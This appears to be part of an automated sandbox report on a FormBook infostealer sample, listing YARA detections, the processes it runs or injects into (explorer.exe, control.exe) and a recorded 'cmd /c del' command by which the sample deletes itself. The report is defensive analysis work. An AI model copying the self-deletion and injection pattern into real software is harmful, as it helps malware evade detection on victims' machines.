                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                              Statistics

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:10:46:03
                                              Start date:28/01/2022
                                              Path:C:\Users\user\Desktop\5tCYPTkM6b.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\5tCYPTkM6b.exe"
                                              Imagebase:0x400000
                                              File size:254186 bytes
                                              MD5 hash:C2CA2BA9C38EB02217588662717BA6C3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Target ID:2
                                              Start time:10:46:07
                                              Start date:28/01/2022
                                              Path:C:\Users\user\Desktop\5tCYPTkM6b.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\5tCYPTkM6b.exe"
                                              Imagebase:0x7ff724940000
                                              File size:254186 bytes
                                              MD5 hash:C2CA2BA9C38EB02217588662717BA6C3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Target ID:4
                                              Start time:10:46:12
                                              Start date:28/01/2022
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0x7ff662bf0000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:high

                                              General

                                              Target ID:14
                                              Start time:10:46:36
                                              Start date:28/01/2022
                                              Path:C:\Windows\SysWOW64\control.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\control.exe
                                              Imagebase:0x840000
                                              File size:114688 bytes
                                              MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              General

                                              Target ID:15
                                              Start time:10:46:41
                                              Start date:28/01/2022
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del "C:\Users\user\Desktop\5tCYPTkM6b.exe"
                                              Imagebase:0x870000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:16
                                              Start time:10:46:42
                                              Start date:28/01/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff774ee0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              No disassembly